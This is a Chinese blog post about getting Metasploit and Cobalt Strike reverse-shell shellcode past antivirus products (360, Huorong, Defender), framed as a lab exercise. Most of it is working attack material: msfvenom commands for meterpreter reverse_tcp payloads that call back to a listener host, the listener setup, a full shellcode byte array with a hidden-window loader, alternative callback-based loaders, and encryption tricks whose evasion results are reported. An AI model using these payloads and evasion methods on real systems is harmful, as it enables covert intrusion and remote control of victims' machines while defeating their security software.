Shellcode免杀对抗(C/C++)

已于 2024-02-17 11:23:32 修改
阅读量2.1w 收藏 24
点赞数 32
文章标签: 网络安全 linux 服务器
于 2024-02-17 11:00:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_74806534/article/details/136136274
版权

Shellcode C/C++免杀,绕过360安全卫士、火绒安全、Defender

C/C++基于cs/msf的上线

首先是测试一下shellcode上线,主要是俩种方法

测试环境

攻击机:kali2023

靶机:win10

msf方法

首先是启动msf

msfconsole

然后msf生成一个shellcode代码

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.178.141 
lport=6688 -f c

或者是x64

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.178.141 LPORT=6688 -f c

注意这里的x64不同在后面如果没有使用对应的编译环境,可能会造成无法上线

这里生成的一个payload,将其编译实现上线

image-20240204215801637

下面就是运行的c文件基本格式,每次使用替换其中的shellcode即可

#include <Windows.h>
#include <stdio.h>
#include <string.h>
​
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"")   //windows控制台程序不出黑窗口
​
unsigned char buf[] =
"\xfc\xe8\x8f\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52"
"\x30\x8b\x52\x0c\x8b\x52\x14\x0f\xb7\x4a\x26\x31\xff\x8b"
"\x72\x28\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d"
"\x01\xc7\x49\x75\xef\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01"
"\xd0\x8b\x40\x78\x85\xc0\x74\x4c\x01\xd0\x50\x8b\x48\x18"
"\x8b\x58\x20\x01\xd3\x85\xc9\x74\x3c\x31\xff\x49\x8b\x34"
"\x8b\x01\xd6\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75"
"\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe0\x58\x8b\x58\x24\x01"
"\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01"
"\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58"
"\x5f\x5a\x8b\x12\xe9\x80\xff\xff\xff\x5d\x68\x33\x32\x00"
"\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\x89\xe8"
"\xff\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80"
"\x6b\x00\xff\xd5\x6a\x0a\x68\xc0\xa8\xb2\x8d\x68\x02\x00"
"\x1a\x0a\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea"
"\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5\x74"
"\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x67"
"\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f"
"\xff\xd5\x83\xf8\x00\x7e\x36\x8b\x36\x6a\x40\x68\x00\x10"
"\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53"
"\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8"
"\x00\x7d\x28\x58\x68\x00\x40\x00\x00\x6a\x00\x50\x68\x0b"
"\x2f\x0f\x30\xff\xd5\x57\x68\x75\x6e\x4d\x61\xff\xd5\x5e"
"\x5e\xff\x0c\x24\x0f\x85\x70\xff\xff\xff\xe9\x9b\xff\xff"
"\xff\x01\xc3\x29\xc6\x75\xc1\xc3\xbb\xf0\xb5\xa2\x56\x6a"
"\x00\x53\xff\xd5";
​
int main()
{
    //方式一:指针执行
   /* ((void(*)(void)) & buf)();*/
​
    //方式二:强制类型转换
    //((void(WINAPI*)(void))&buf)();
​
    //方式三:申请动态内存加载
    /*char* Memory;
    Memory = VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    memcpy(Memory, buf, sizeof(buf));
    ((void(*)())Memory)();*/
​
    //方式四:嵌入汇编加载
    //__asm {
    //lea eax,buf
    //call eax
    //}
​
    //方式五:汇编花指令
    //__asm{
    //mov eax, offset shellcode
    //_emit 0xFF
    //_emit 0xE0
    //}
}

注意上面说到小细节,我并没有使用x64所以是x86的,选择Release,否则影响上线结果

image-20240204224028433

成功生成exe文件

image-20240204224548038

接下来打开msf的监听功能

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.178.141 //kali的地址或者全ip 0.0.0.0
set lport 6688
run

image-20240204225205501

把exe文件放到靶机运行,成功监听

image-20240205195234758

cs方法

先开启cs

image-20240205195806396

win10打开cs

image-20240205195954059

选择之前配置好的监听器,注意这里是x64,后面编译的时候要使用x64编译

image-20240205200238384

image-20240205200112004

之后打开.c文件是一个未编译代码,放到上文的编译代码中,注意这里是x64编译,用的方式三,使用.c文件

image-20240205200416762

上传并运行生成的exe文件,发现成功上线

image-20240205201216774

免杀开始

原理

shellcode相对于可执行文件更改更容易,不易损坏

先通过汇编,运行

image-20240207160540783

我们可以通过分析一下这个exe文件时如何上线到正确的地址的,这里联系msf源码中的windows的reverse_tcp.rb进行分析

image-20240207175451174

可以看出在执行完call ebp以后,就执行了设置地址的操作,也就是说在shellcode中存在了反弹连接的ip地址

从执行代码中可以看出,运行玩call eax 才能调用buf

  • lea eax, buf:这是一条汇编指令,它的作用是将 buf 的地址加载到 eax 寄存器中。lea 指令不是真正意义上的加载,而是计算出 buf 的地址,但是不进行内存访问。

  • call eax:这是一条汇编中的调用指令,它的作用是调用 eax 寄存器中所存储的地址对应的函数。在这里,eax 寄存器中存储的是 buf 的地址,所以实际上是调用了 buf 所代表的函数。

这段代码的具体作用取决于 buf 所指向的内容,因为它实际上是间接调用了一个函数。

  __asm {
    lea eax,buf
    call eax
    }

将生成的exe文件拖入debug程序中,进行分析,开启自动步入

image-20240207175346759

只有运行完call eax 才能出buf的内容,找到 call ebp,下面一个就是ip

image-20240207184500593

16进制转ip,发现是我们kali的ip

image-20240207184359896

下面是16进制转10进制,得到端口

image-20240207184913003

这里便是杀毒软件杀毒的原理,这就是特征,我们只需要将木马程序进行简单的分析,就能得到shell回连的IP地址和端口,如果杀毒软件发现我们的可执行文件是一个木马程序。

特别的像360会上传可疑文件到沙盒进行测试,有时候你上传的木马在监听的时候,可能会有别的ip被监听,这就是沙盒测试

免杀手法测试

找到最好的方法,对杀毒工具进行测试

换加载器

加载器的作用:由于shellcode是一段可以执行的二进制代码,因此需要开辟出一段可以读写可操作的地址来运行shellcode,而这就是加载器的作用。

可以理解为上面的代码除了shellcode就是加载器

因为我们的加载器的特征,各平台杀毒软件都有了已经,所有我们就要用新的,特征没有被锁定

我在网上找了几个加载器试了一下,基本上都过不去

比如说,这几个

//#include "stdafx.h"
#include <Windows.h>
#include <stdio.h>
​
int main()
{
    char shellcode[] = "\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
        "\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
        "\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
        "\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
        "\x57\x78\x01\xc2\x8b\x7a\x20\x01"
        "\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
        "\x45\x81\x3e\x43\x72\x65\x61\x75"
        "\xf2\x81\x7e\x08\x6f\x63\x65\x73"
        "\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
        "\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
        "\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
        "\xb1\xff\x53\xe2\xfd\x68\x63\x61"
        "\x6c\x63\x89\xe2\x52\x52\x53\x53"
        "\x53\x53\x53\x53\x52\x53\xff\xd7";
    HANDLE hAlloc = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    memcpy(hAlloc, shellcode, sizeof(shellcode));
    EnumDateFormatsA((DATEFMT_ENUMPROCA)hAlloc , LOCALE_SYSTEM_DEFAULT, (DWORD) 0);
}

还有这个

//#include "stdafx.h"
#include <Windows.h>
#include <stdio.h>
​
​
int main()
{
    char shellcode[] = "\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
        "\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
        "\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
        "\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
        "\x57\x78\x01\xc2\x8b\x7a\x20\x01"
        "\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
        "\x45\x81\x3e\x43\x72\x65\x61\x75"
        "\xf2\x81\x7e\x08\x6f\x63\x65\x73"
        "\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
        "\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
        "\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
        "\xb1\xff\x53\xe2\xfd\x68\x63\x61"
        "\x6c\x63\x89\xe2\x52\x52\x53\x53"
        "\x53\x53\x53\x53\x52\x53\xff\xd7";
    HANDLE hAlloc = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    memcpy(hAlloc, shellcode, sizeof(shellcode));
    
    EnumSystemLanguageGroupsA((LANGUAGEGROUP_ENUMPROCA) hAlloc,LGRPID_SUPPORTED,0);
}

估计是放网上都被用烂了,各个平台早就锁定了,要是代码能力好,还是自己写

image-20240207223225950

image-20240207224206969

ShellCode 变异-编码混淆加密算法

Xor Aes Hex Rc4 Rsa 等,可以是网上的加密代码,也可以自己写(自己写肯定是最好的)

1.网上的工具

GitHub - Arno0x/ShellcodeWrapper: Shellcode wrapper with encryption for multiple target languages

先cs来一个shellcode

image-20240207230652853

文件重命名然后运行脚本

python2 shellcode_encoder.py -cpp -cs -py shellcode.raw swq xor

编译加密后的代码,运行文件火绒和360都没过

image-20240207233158719

2.我师傅给我编写的工具(工具就不发出来了)

可以过火绒和360

image-20240207233307557

image-20240207233355668

3、Hex

msfvenom -p windows/meterpreter/reverse_tcp lhost=47.94.236.117

lport=6688 -f c

CyberChef

https://github.com/ByPassAVTeam/ShellcodeLoader

可以过火绒和360,但是过不了defender

4、Rc4

网络信息安全:RC4加密算法的实现_采用rc4_256加密算法 保证了重要数据在传输过程中的完整-CSDN博客

加密强度很高,惊讶于可以过火绒

image-20240207232055811

也可以过360,但是三分钟之后就不行了,估计360沙盒测试没了

image-20240207232246108

把defender也过了

以上工具仅供参考,但是过几个月甚至几天后,就被各个平台锁定了

小小邵同学
关注
  • 32
    点赞
  • 24
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
如何利用十行C++代码,绕过杀毒软件实现免杀
03-17 2723
我相信大部分的读者都会同意这个观点,绕过大部分杀毒软件的基本方法都很平常没什么特殊的。然而,我也偶尔会遇到一些人仅仅依靠工具生成二进制文件,这些文件很容易被杀毒软件通过指纹标记出来。本文主要是为这些人所准备的。 下面是小编整理好的一套C/C++资料,加小编C/C++编程学习群825414254,获取系统性学习C/C++的学习资料 在我们开始接触这段小巧的 C++ 代码前,我想先介绍一个可以非常...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8180
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
Shellcode编译器-C/C++开发
05-26
Shellcode编译器Shellcode Compiler是一个程序,可将C / C ++样式代码编译成一个小的,与位置无关且没有NULL的Shellcode,适用于Windows(x86和x64)和Linux(x86和x64)。 可以调用任何Windows AP Shellcode编译器Shellcode Compiler是一个程序,可将C / C ++样式代码编译成一个小的,与位置无关且无NULL的Windows(x86和x64)和Linux(x86和x64)外壳代码。 可以通过用户友好的方式调用任何Windows API函数或Linux syscall。 Shellcode编译器将源文件作为输入,并使用其自己的编译器来解释代码并生成由Keystone引擎组装的组装文件。 命令行选项-h(--help):S
107-免杀对抗-C&C++&溯源ShellCode上线&混淆变异算法&回调编译执行
qq_46081990的博客
07-13 1236
今天主要讲的是shellcode混淆免杀: 1 、首先明确为什么不对exe类型做手脚,而是对shellcode做手脚?因为对exe类型做手脚(如加壳)可以免杀,但是可能导致出错,无法上线。而对shellcode进行操作,再编译打包成exe,一般不会有这种问题。2 、杀软如何检测到病毒的?一般是通过逆向分析后门文件,匹配病毒特征检测到的。3 、如何用shellcode实现免杀?今天讲的是使用加密算法(如XOR、AES、Hex、RC4)对shellcode进行加密混淆,实现免杀
学习记录:内网穿透+ShellCode+C++语言二次编译 免杀绕过火绒 渗透Win10提取密码
qq_60709081的博客
06-24 1327
攻击机:Kali (虚拟机)靶机: Windows 10 22H2 版本 10.0.19045(物理机)工具:MSF,VS,花生壳通过C++二次编译制作免杀木马,绕过火绒检测,实现对靶机的控制,windows本地提权,获取并破解用户密码。今天又进步了一点点,之后打算去打基础了,一步一步来。但毕竟做任何事都要有些动力的,做一个ScriptsKids反倒可以增加自己的兴趣和动力呢。🎉✨免责声明:本文仅作学习、深研而用,若有犯罪行为,一切后果自负,与本文作者无关。
免杀入门---shellcode免杀
LvHLong的博客
05-03 5286
前言 本文仅用于技术学习和交流,严禁用于非法用途,否则产生的一切后果自行承担。 基础概念 免杀 免杀技术全称为反杀毒技术Anti Anti- Virus简称“免杀”,它指的是一种能使病毒木马免于被杀毒软件查杀的技术。 杀毒软件工作原理 市面上的杀毒软件基本由扫描器、病毒特征库和虚拟机组成,它会把文件放在虚拟机内运行,扫描该文件的特征,包括静态特征、内存特征、行为特征等,通过和病毒特征库对比来判断一个文件是否为恶意文件。安全厂商一直在收集市面上出现的...
使用xshellex,您可以在x64dbg,ollydbg和抗扰度调试器中粘贴任何类型的c-shellcode字符串-C/C++开发
05-27
xshellex警告:世界上最丑陋的代码使用xshellex,您可以在x64dbg,ollydbg和抗扰度调试器中粘贴任何类型的c-shellcode字符串。 Al xshellex警告:世界上最丑陋的代码使用xshellex,您可以在x64dbg,ollydbg和抗扰度调试器中粘贴任何类型的c-shellcode字符串。 您也可以将“ binary-copied-clipboard”转换为c-shellcode字符串。 该插件使用我的c-shellcode转换器进行十六进制:https://github.com/David-Reguera-Garcia-Dreg/shellex安装只需下载https://github.com/David-Reguera-Garcia-Dreg/xshellex/releases /download/r0.1b/xshellex01b.zip解压缩.zip x64dbg,将发布文件夹复制到
免杀简单介绍
qq_38675102的博客
01-05 2610
免杀简单介绍
生命在于学习——免杀
易水哲的博客
10-25 2067
一些免杀的知识,没有实操。
c++静态免杀修正版
crowsec
05-16 1160
在Github上看到一个c++免杀,在4月6号的时候,还是bypass 很多的,但是一个月过去了,我执行之后发现了只能过火绒。
C/C++ 实现切片免杀的思路
CSDN
10-20 5011
今天突然想到了一个好玩的免杀思路,原理就是想办法切断磁盘特征与内存特征,关于沙盒免杀我寻思着,这样可以将不同的的DLL映射到内存,在内存中他们的特征也是被切断的,在注入器上做判断如果是沙盒则不加载,不是则分别注入三个甚至是更多的DLL,将我们的ShellCode切片力度更细,分配到几百个甚至上千个DLL上面,做成一个链,应该可以,没尝试过,抽空可以试试。 如果我们把粒度变得细致,捕捉特征也会变...
通过回调执行其他Shellcode-C/C++开发
05-27
替代代码执行这种方法的受欢迎程度超出了预期,因此我只是想对alfarom256进行喊叫,以便向我介绍cal替代代码执行这种方法的受欢迎程度超过了预期,因此我只是想对alfarom256进行喊叫,以通知我关于回调函数,并向我展示了CreateThreadPoolWait技术。 我还想对ch3rn0byl进行大力宣传,以鼓励我继续进行该项目。 根据Microsoft的说法,回调函数是托管应用程序中的代码,可帮助非托管DLL函数完成任务。 调用回调函数从法力间接传递
精品软件工具--该项目为Shellocde加载器,详细介绍了我们如何绕过防病毒软件,以及该工具如何使用.zip
02-07
精品软件工具--该项目为Shellocde加载器,详细介绍了我们如何绕过防病毒软件,以及该工具如何使用
快速将Windows动态链接库转换为ShellCode-C/C++开发
05-26
DllToShellCode快速转换Windows动态...如果您不想使用dll内部函数,则调用shellcode会返回导出函数的地址,因此可以在其中使用在使用OverView Few Assembly的任何地方,几乎所有代码都是用C语言开发的(仅使用汇编语言
快速调试在恶意软件分析过程中提取的Shellcode-C/C++开发
05-26
BlobRunner BlobRunner是一个简单的工具,用于快速调试在恶意软件分析过程中提取的shellcode。 BlobRunner为目标文件分配内存,并跳转到已分配内存的基数(或偏移量)。 这允许进行分析BlobRunner BlobRunner是一个...
Linux多进程(五) 进程池 C++实现
最新发布
Lyajpunov的博客
04-26 615
进程池是一种并发编程模式,用于管理和重用多个处理任务的进程。它通常用于需要频繁创建和销毁进程的情况,以避免因此产生的开销。减少进程创建销毁的开销:避免频繁创建和销毁进程所带来的系统资源开销。提高系统响应速度:由于进程已经初始化并且一直保持在内存中,可以立即分配执行任务,减少了任务等待时间。控制资源使用:通过限制进程池中的进程数量,可以控制系统资源的使用情况,避免资源过度消耗。
13 Linux实操篇-网络配置
qq_74289024的博客
04-23 927
子网ip 与网关。
Linux——web服务配置
Xinan_____的博客
04-23 1069
GET:请求获取指定资源的表示形式。使用GET方法,客户端请求服务器发送某个资源。POST:向指定资源提交数据,用于处理表单提交、文件上传等操作。PUT:向指定资源位置上传其最新内容,用于更新资源。DELETE:请求服务器删除指定资源。HEAD:请求获取与实体相对应的头部信息,用于获取资源的元数据。OPTIONS:请求查询服务器支持的HTTP方法。TRACE:请求服务器回显收到的请求消息,用于测试或诊断。200 OK:请求成功。:永久重定向,请求的资源已经被分配了新的。
shellcode 免杀
05-29
Shellcode 免杀技术是指通过对 Shellcode 代码进行加密、混淆、变形等手段,使其在被杀毒软件或安全设备检测时无法被识别,从而达到免杀的目的。 以下是一些常见的 Shellcode 免杀技术: 1. 加密:将 Shellcode 代码进行加密,使其在内存中存储时无法被检测到。 2. 随机变形:通过修改 Shellcode 代码中的一些关键字、函数名等来使其难以被检测到。 3. 延时加载:将 Shellcode 代码分为多个部分,只有在特定条件下才会加载,从而避免被杀毒软件或安全设备检测到。 4. 模块化:将 Shellcode 代码拆分为多个模块,每个模块都可以独立执行,从而难以被检测到。 5. 零宽度字符:利用 Unicode 中的零宽度字符来隐藏 Shellcode 代码,使其在被杀毒软件或安全设备检测时无法被识别。 需要注意的是,Shellcode 免杀技术只是提高了 Shellcode免杀能力,但并不能完全避免被检测到。因此,在实际应用中,还需要结合其他防御措施来确保系统的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值